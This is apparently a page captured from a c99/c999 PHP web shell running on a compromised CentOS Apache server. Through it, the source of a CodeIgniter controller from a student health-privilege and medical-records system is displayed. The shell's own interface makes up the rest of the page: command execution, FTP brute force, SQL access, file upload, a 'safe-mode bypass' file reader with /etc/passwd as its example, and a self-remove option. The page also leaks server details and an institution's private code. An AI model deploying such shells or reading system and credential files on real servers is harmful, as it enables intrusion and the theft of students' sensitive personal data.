!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/esa/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     health.php (18.86 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include('sa_controller.php');
class 
Health extends Sa_controller {
    function 
sdtHp_input () {
        
$this->load->model($this->config->item('rg_folder').'mo_rg_student','std');
        
$this->load->model($this->config->item('rg_folder').'mo_rg_healthprivilege','hp');
        
$this->load->model($this->config->item('ppc_folder').'mo_Prefix','pf');
        
$this->load->model($this->config->item('sa_folder').'sa_health_privilege_model','shp');
    
            
$stdId $this->input->post('stdId');
            
$data['v_search'] = ($this->input->post('v_search')) ? $this->input->post('v_search') : '';
            
$data['v_search2'] = ($this->input->post('v_search2')) ? $this->input->post('v_search2') : '';

            
$con_qu_std = array('stdId' => $stdId);
            
$qu_std $this->std->qryStdJoinSdt($con_qu_std);
            if (
$qu_std->num_rows()) {
                
$info = array();
                
$this->shp->htp_std_id $stdId;
                
$qu_info $this->shp->qry_last_time();
                if (
$qu_info->num_rows()){
                    
$row $qu_info->row();
                    
$info['sta'] = $row->htp_status;
                    
$info['htp_id'] = $row->htp_id;
                }
                
$data['info'] = $info;
                
$data['qu_std'] = $qu_std;
            }

        
$data['rs_hp'] = $this->hp->get_options();
        
$data['rs_pf'] = $this->pf->get_options();
        
//if($this->input->post('stdId')==true or $this->input->post('v_search')==true or $this->input->post('v_search2')==true){
        
if($this->input->post('stdId')==false or $this->input->post('v_search')==true or $this->input->post('v_search2')==true){
            
$rs_std $this->std->JoinForEsaHealth($data['v_search2'],$data['v_search']);
            
$data['rs_std'] = $rs_std;
            if (
$rs_std->num_rows()){
                
$htp_status = array();
                foreach (
$rs_std->result() as $row_std) {
                    
$this->shp->htp_std_id $row_std->stdId;
                    
$qu_info $this->shp->qry_last_time();
                    if (
$qu_info->num_rows()){
                        
$row $qu_info->row();
                        
$htp_status[$row_std->stdId] = $row->htp_status;
                    }
                }
                
$data['sta'] = $htp_status;
            }
        }
        
$this->output("v_addSdtHp",$data);
    }
    
    function 
sdtHp_del(){
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">''</div>');
        
$this->form_validation->set_rules('stdId'' ''trim|required|xss_clean');

        if (
$this->form_validation->run()) {
            
$this->load->model($this->config->item('rg_folder').'mo_rg_studentdetails','sdt');
            
$this->load->model($this->config->item('sa_folder').'sa_health_privilege_model','shp');
            
$this->db->trans_begin();
            
            
$this->shp->htp_std_id $this->input->post('stdId');
            
$qu_info $this->shp->qry_last_time();
            if (
$qu_info->num_rows()){
                
$row $qu_info->row();
                
$this->shp->htp_id $row->htp_id;
                
$this->shp->delete();
                
                
$this->shp->htp_std_id $this->input->post('stdId');
                
$qu_info2 $this->shp->qry_last_time();
                if (
$qu_info2->num_rows()){
                    
$row2 $qu_info2->row();
                    
                    
$this->sdt->sdtStdId $row2->htp_std_id;
                    
$this->sdt->get_by_key(TRUE);
                    
                    
$this->sdt->sdtHpId $row2->htp_hpId;
                    
$this->sdt->update();
                }else{
                    
$this->sdt->sdtStdId $this->input->post('stdId');
                    
$this->sdt->get_by_key(TRUE);
                        
                    
$this->sdt->sdtHpId NULL;
                    
$this->sdt->update();
                }
                
                if (
$this->db->trans_status() === FALSE){
                    
$this->db->trans_rollback();
                }else{
                    
$this->db->trans_commit();
                }
            }else{
                
$this->sdt->sdtStdId $this->input->post('stdId');
                
$this->sdt->get_by_key(TRUE);
                        
                
$this->sdt->sdtHpId NULL;
                
$this->sdt->update();
            }
        }
        
redirect($this->config->item('sa_folder').'health/sdtHp_input');
    }

    function 
sdtHp_update () {
    
        if(
$this->input->post('btnCancel')){//click cancel button
            
redirect($this->config->item('sa_folder').'health/sdtHp_input');
        }else{
            
$this->load->library('form_validation');
            
$this->form_validation->set_error_delimiters('<div class="error">''</div>');
            
$this->form_validation->set_rules('hpId''สิทธิการรักษาพยาบาล''trim|required|xss_clean');
            
$this->form_validation->set_rules('htp_status''สถานะ''trim|required|xss_clean');

            
$stdId $this->input->post('stdId');

            if (
$stdId) {
                
$this->form_validation->set_rules('std''รหัส/ชื่อ-สกุลนักศึกษา''trim|required|xss_clean');
            } else {
                
$this->form_validation->set_rules('wk11_co''รหัส/ชื่อ-สกุลนักศึกษา''trim|required|xss_clean');
            }

            if (
$this->form_validation->run() == FALSE) {
                
$this->sdtHp_input();
            } else {
                
$this->db->trans_begin();

                
$this->load->model($this->config->item('rg_folder').'mo_rg_student','std');
                
$this->load->model($this->config->item('rg_folder').'mo_rg_studentdetails','sdt');
                
$this->load->model($this->config->item('sa_folder').'sa_health_privilege_model','hp');
                
                
$rs explode("###", ($this->input->post('std') ? $this->input->post('std') : $this->input->post('wk11_co')));
                foreach (
$rs as $value) {
                    
$std explode(":"$value);

                    
$con_qu_std = array('stdCode' => $std[0]);
                    
$qu_std $this->std->qryStd($con_qu_std);
                    if (
$qu_std->num_rows()) {
                        if(
$this->input->post('std')){
                            
$this->hp->htp_id $this->input->post('htp_id');
                            
$qu_hp $this->hp->get_by_key(TRUE);
                            
$this->hp->htp_std_id $qu_std->row()->stdId;
                            
$this->hp->htp_hpId $this->input->post('hpId');
                            
$this->hp->htp_status $this->input->post('htp_status');
                            
$this->hp->htp_update_date date("Y-m-d H:i:s");
                            
                            if(
$this->hp->htp_id){
                                
$this->hp->update();
                            } else {
                                
$this->hp->htp_create_date date("Y-m-d H:i:s");
                                
$this->hp->insert();
                            }
                            
$this->hp->htp_std_id $qu_std->row()->stdId;
                            
$qu_info $this->hp->qry_last_time();
                            if (
$qu_info->num_rows()){
                                
$row $qu_info->row();
                                
                                
$this->sdt->sdtStdId $row->htp_std_id;
                                
$this->sdt->get_by_key(TRUE);
                                
                                
$this->sdt->sdtHpId $row->htp_hpId;
                                
$this->sdt->update();
                            }
                        }else{
                            
$this->hp->htp_id $this->input->post('htp_id');
                            
$this->hp->htp_std_id $qu_std->row()->stdId;
                            
$this->hp->htp_hpId $this->input->post('hpId');
                            
$this->hp->htp_status $this->input->post('htp_status');
                            
$this->hp->htp_create_date date("Y-m-d H:i:s");
                            
$this->hp->htp_update_date date("Y-m-d H:i:s");
                            
$this->hp->insert();
                            
                            
$this->sdt->sdtStdId $qu_std->row()->stdId;
                            
$this->sdt->get_by_key(TRUE);

                            
$this->sdt->sdtHpId $this->input->post('hpId');
                            
$this->sdt->update();
                        }
                    }
                }
                
                if (
$this->db->trans_status() === false) {
                    
$this->db->trans_rollback();
                } else {
                    
$this->db->trans_commit();
                }

                
redirect($this->config->item('sa_folder').'health/sdtHp_input');
            }
        }
    }

    function 
sdtHp_His(){
        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">''</div>');
        
$this->form_validation->set_rules('stdId'' ''trim|required|xss_clean');
        
$this->form_validation->set_rules('stdCode'' ''trim|required|xss_clean');
        
$this->form_validation->set_rules('stdName'' ''trim|required|xss_clean');
        
        if (
$this->form_validation->run() == TRUE) {
            
$this->load->model($this->config->item('rg_folder').'mo_rg_student','std');
            
$this->load->model($this->config->item('rg_folder').'mo_rg_healthprivilege','hp');
            
$this->load->model($this->config->item('ppc_folder').'mo_Prefix','pf');
            
$this->load->model($this->config->item('sa_folder').'sa_health_privilege_model','shp');
            
            
$data['rs_hp'] = $this->hp->get_options();
            
$data['rs_pf'] = $this->pf->get_options();
            
            
$data['stdCode'] = $this->input->post('stdCode');
            
$data['stdName'] = $this->input->post('stdName');
            
$this->shp->htp_std_id $this->input->post('stdId');
            
$rs_his $this->shp->qry_HisStd();
            
$data['rs_std'] = $rs_his;
            
            
$this->output_popup("v_hisSdtHp",$data);
        }
        
    }

    function 
hth_input () {
        
$this->load->model($this->config->item('sa_folder').'sa_health_model','hth');
        
$this->load->model($this->config->item('sa_folder').'sa_bmi_model','bmi');

        
$hth_id $this->input->post('hth_id');
        
$data['v_search'] = ($this->input->post('v_search')) ? $this->input->post('v_search') : '';

        
$this->hth->hth_id $hth_id;
        
$qu_hth $this->hth->get_by_key_2();
        if (
$qu_hth->num_rows()) {
            
$data['qu_hth'] = $qu_hth;
            
            
$row $qu_hth->row();
            
$this->bmi->bmi_id $row->hth_result_BMI;
            
$data['qu_bmi2'] = $this->bmi->get_by_key();
        }
        
        
$data['qu_bmi'] = $this->bmi->get_options2();
        
        if(
$this->input->post('v_search')){
            
$data['rs_hth'] = $this->hth->get_by_std($data['v_search']);
        }

        
$this->output("v_add_health",$data);
    }
    
    function 
loadBmiTB(){
        if (
$this->input->server('REQUEST_METHOD') === 'POST'){
            
$this->load->model($this->config->item('sa_folder').'sa_bmi_model','bmi');
            
$this->form_validation->set_rules('grp'' ''trim|required|xss_clean');
            
$tb['tb'] = "";
            if (
$this->form_validation->run() == TRUE) {
                
$rs $this->bmi->getByGroup($this->input->post('grp'));
                
$tb['tb'] .= "<table width=\"80%\" border=\"0\" align=\"center\" cellpadding=\"0\" cellspacing=\"0\" class=\"tb_1\">
                        <tr>
                            <th colspan=\"3\">"
.$this->input->post('grp')."</th>
                        </tr>
                        <tr>
                            <th>ผลการประเมิน</th><th>ค่าดัชนีมวลกายขั้นต่ำ</th><th>ค่าดัชนีมวลกายขั้นสูง</th>
                        </tr>"
;
                    
                foreach(
$rs->result() as $row) {
                    
$tb['tb'] .= "<tr><td>".$row->bmi_name."</td><td>".$row->bmi_min."</td><td>".$row->bmi_max."</td></tr>"
                }
                
$tb['tb'] .= "</table>";
            }
            
            
$point[] = $tb;
            echo 
json_encode($point);
        }
    }
    
    function 
calBmi($num,$set){
        
$this->load->model($this->config->item('sa_folder').'sa_bmi_model','bmi');
        
$qu $this->bmi->calBmi($set$num);
        if(
$qu->num_rows()>0){
             
$row $qu->row();
             return 
$row->bmi_id;
        }else{
            return 
0;
        }
    }
    
    function 
checkZero($str){
        if(
$str!=""){    
            if(
$str<=0){
                
$this->form_validation->set_message('checkZero','%s ต้องเป็นเลขที่มากกว่า 0');
                return 
false;
            }else{
                return 
true;
            }
        }else{
            return 
true;
        }
    }
    
    function 
checkDate($str){
        
$this->load->model($this->config->item('sa_folder').'sa_health_model','hth');
        
$this->load->model($this->config->item('rg_folder').'mo_rg_student','std');
        
        
$bet $this->DateDiff(splitDateForm2($this->input->post('hth_fr_date'), '-'),splitDateForm2($this->input->post('hth_to_date'), '-'));
        
$rs explode("###"$str);
        
$ct 0;
        foreach (
$rs as $value) {
            
$std explode(":"$value);
            
$con_qu_std = array('stdCode' => $std[0]);
            
$qu_std $this->std->qryStd($con_qu_std);
            if (
$qu_std->num_rows()) {
                if(
$bet>=0){
                    for(
$i=0;$i<=$bet;$i++){
                        
$date date("Y-m-d",strtotime("+$i day"strtotime(splitDateForm2($this->input->post('hth_fr_date'), '-'))));
                        if(
$this->input->post('hth_id')){
                            
$to $this->hth->validDate($qu_std->row()->stdId,$date,$this->input->post('hth_id'));
                        }else{
                            
$to $this->hth->validDate($qu_std->row()->stdId,$date);
                        }
                        if(
$to->num_rows()>0){
                            
$ct++;
                        }
                    }
                }
            }
        }
        if(
$ct>0){
            
$this->form_validation->set_message('checkDate''วันที่ท่านเลือกมีข้อมูลนักศึกษาแล้วในระบบ'); 
            return 
FALSE;
        }else{
            return 
true;
        }
    }
    function 
DateDiff($strDate1,$strDate2)
    {
        return (
strtotime($strDate2) - strtotime($strDate1))/  ( 60 60 24 );  // 1 day = 60*60*24
    
}

    function 
hth_insert_update () {
        if(
$this->input->post('btnCancel')){//click cancel button
            
redirect($this->config->item('sa_folder').'health/hth_input');
        }else{
            
$this->load->library('form_validation');
            
$this->form_validation->set_error_delimiters('<div class="error">''</div>');
            
$this->form_validation->set_rules('hth_id'' ''trim|xss_clean');

            
$hth_id $this->input->post('hth_id');

            if (
$hth_id) {
                
$this->form_validation->set_rules('std''รหัส/ชื่อ-สกุลนักศึกษา''trim|required|xss_clean|callback_checkDate');
            } else {
                
$this->form_validation->set_rules('wk11_co''รหัส/ชื่อ-สกุลนักศึกษา''trim|required|xss_clean|callback_checkDate');
            }

            
$this->form_validation->set_rules('hth_disease''โรค''trim|required|xss_clean');
            
$this->form_validation->set_rules('hth_symptom''อาการ''trim|required|xss_clean');
            
$this->form_validation->set_rules('hth_diagnose''ผลการตรวจต่างๆ''trim|xss_clean');
            
$this->form_validation->set_rules('hth_treatment''การรักษาและคำแนะนำ''trim|xss_clean');
            
$this->form_validation->set_rules('hth_result_diagnose''ผลการรักษา''trim|xss_clean');
            
$this->form_validation->set_rules('hth_place''สถานที่รักษา''trim|xss_clean');
            
$this->form_validation->set_rules('hth_pd''สถานะการนอนรักษาตัว ''trim|xss_clean');
            
$this->form_validation->set_rules('bmi_set''ชุดดัชนีมวลกาย''trim|xss_clean');
            
$this->form_validation->set_rules('hth_weight''น้ำหนัก''trim|xss_clean|callback_checkZero');
            
$this->form_validation->set_rules('hth_height''ส่วนสูง''trim|xss_clean|is_natural_no_zero|max_length[3]');
            
$this->form_validation->set_rules('hth_waist''เส้นรอบเอว''trim|xss_clean|callback_checkZero');
            
$this->form_validation->set_rules('hth_vaccine''วัคซีน''trim|xss_clean');
            
$this->form_validation->set_rules('hth_xray''x-ray''trim|xss_clean');
            
$this->form_validation->set_rules('hth_fr_date''วันที่เริ่มต้น''trim|required|xss_clean|callback_checkFrDate[hth_to_date]');
            
$this->form_validation->set_rules('hth_to_date''วันที่สิ้นสุด''trim|required|xss_clean');
            
            if (
$this->form_validation->run() == FALSE) {
                
$this->hth_input();
            } else {
                
$this->db->trans_begin();

                
$this->load->model($this->config->item('rg_folder').'mo_rg_student','std');
                
$this->load->model($this->config->item('rg_folder').'mo_rg_studentdetails','std_d');
                
$this->load->model($this->config->item('sa_folder').'sa_health_model','hth');
                
$this->load->model($this->config->item('sa_folder').'sa_bmi_model','bmi');
                
$err_BMI 0;
                
$rs explode("###", ($this->input->post('std') ? $this->input->post('std') : $this->input->post('wk11_co')));
                foreach (
$rs as $value) {
                    
$std explode(":"$value);

                    
$con_qu_std = array('stdCode' => $std[0]);
                    
$qu_std $this->std->qryStd($con_qu_std);
                    if (
$qu_std->num_rows()) {
                        
$this->hth->hth_id $hth_id;
                        
$this->hth->get_by_key(TRUE);
                        
$this->std_d->sdtStdId $qu_std->row()->stdId;
                        
$this->std_d->get_by_key(TRUE);
                        
                        
$w = ($this->input->post('hth_weight'))? trim($this->input->post('hth_weight')):$this->std_d->sdtWeight;
                        
$h = ($this->input->post('hth_height'))? trim($this->input->post('hth_height')):$this->std_d->sdtHeight;
                        if(
$w==and $h==0){
                            
$bmi_num 0;
                        }else{
                            
$htom $h/100;
                            
$bmi_num $w/($htom*$htom);
                        }
                        
                        

                        
$this->hth->hth_std_id $qu_std->row()->stdId;
                        
$this->hth->hth_disease trim($this->input->post('hth_disease'));
                        
$this->hth->hth_symptom trim($this->input->post('hth_symptom'));
                        
$this->hth->hth_diagnose trim($this->input->post('hth_diagnose'));
                        
$this->hth->hth_treatment trim($this->input->post('hth_treatment'));
                        
$this->hth->hth_result_diagnose trim($this->input->post('hth_result_diagnose'));
                        
$this->hth->hth_place trim($this->input->post('hth_place'));
                        
$this->hth->hth_pd = ($this->input->post('hth_pd')!="")? trim($this->input->post('hth_pd')):"OPD";
                        
$this->hth->hth_weight $w;
                        
$this->hth->hth_height $h;
                        
$this->hth->hth_waist trim($this->input->post('hth_waist'));
                        
$this->hth->hth_BMI $bmi_num;
                        
$this->hth->hth_result_BMI $this->bmi->getBmi($bmi_numsplitDateForm2($this->input->post('hth_fr_date')), splitDateForm2($this->input->post('hth_to_date')));
                        
$this->hth->hth_vaccine trim($this->input->post('hth_vaccine'));
                        
$this->hth->hth_xray trim($this->input->post('hth_xray'));
                        
$this->hth->hth_fr_date splitDateForm2($this->input->post('hth_fr_date'), '/');
                        
$this->hth->hth_to_date splitDateForm2($this->input->post('hth_to_date'), '/');
                        
$this->hth->hth_update_date date('Y-m-d H:i:s');
                        
$this->hth->hth_update_us_login $this->session->userdata('UsLogin');
                        
                        if (
$this->hth->hth_result_BMI == 0) {
                            
// do not thing
                            
$err_BMI 1;
                        } else {
                            if (
$hth_id) {
                                
$this->hth->update();
                            } else {
                                
$this->hth->hth_create_date date('Y-m-d H:i:s');
                                
$this->hth->hth_create_us_login $this->session->userdata('UsLogin');
                                
$this->hth->insert();
                            }
                        }
                    }
                }

                if (
$this->db->trans_status() === false) {
                    
$this->db->trans_rollback();
                } else {
                    
$this->db->trans_commit();
                }
                if (
$err_BMI) {
                    
$this->session->set_flashdata('err_BMI''<br><font color="red">ไม่สามารถบันทึกรายการของนักศึกษา เนื่องจากค่า BMI ไม่ถูกต้อง<br></font>');
                }
                
redirect($this->config->item('sa_folder').'health/hth_input');
            }
        }
    }

    function 
hth_delete () {
        
$this->load->model($this->config->item('sa_folder').'sa_health_model','hth');

        
$hth_id $this->input->post('hth_id');

        
$this->hth->hth_id $hth_id;
        
$this->hth->delete();

        
redirect($this->config->item('sa_folder').'health/hth_input');
    }
    
    function 
check_bmi(){
        if (
$this->input->server('REQUEST_METHOD') === 'POST'){
            
$num $this->input->post('bmi');
            
$set $this->input->post('set');
            if(
$this->calBmi($num,$set)==0){
                echo 
"N";
            }else{
                echo 
"Y";
            }
        }
    }

    function 
hth_report () {
        
$this->load->model($this->config->item('sa_folder').'sa_health_model','hth');

        
$data['rs_hth'] = $this->hth->get_all_2();

        
$this->output_popup("v_rpt_health",$data);
    }
//    function hth_report(){
//        $this->load->model($this->config->item('sa_folder').'sa_health_model','hth');
//        $this->load->model($this->config->item('sa_folder').'sa_bmi_model','bmi');
//
//        $hth_id = $this->input->post('hth_id');
//        $data['v_search'] = ($this->input->post('v_search')) ? $this->input->post('v_search') : '';
//
//        $this->hth->hth_id = $hth_id;
//        $qu_hth = $this->hth->get_by_key_2();
//        if ($qu_hth->num_rows()) {
//            $data['qu_hth'] = $qu_hth;
//            
//            $row = $qu_hth->row();
//            $this->bmi->bmi_id = $row->hth_result_BMI;
//            $data['qu_bmi2'] = $this->bmi->get_by_key();
//        }
//        
//        $data['qu_bmi'] = $this->bmi->get_options2();
//
//        $data['rs_hth'] = $this->hth->get_by_std($data['v_search']);        
//
//        $this->output("v_report_health",$data);
//    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0172 ]--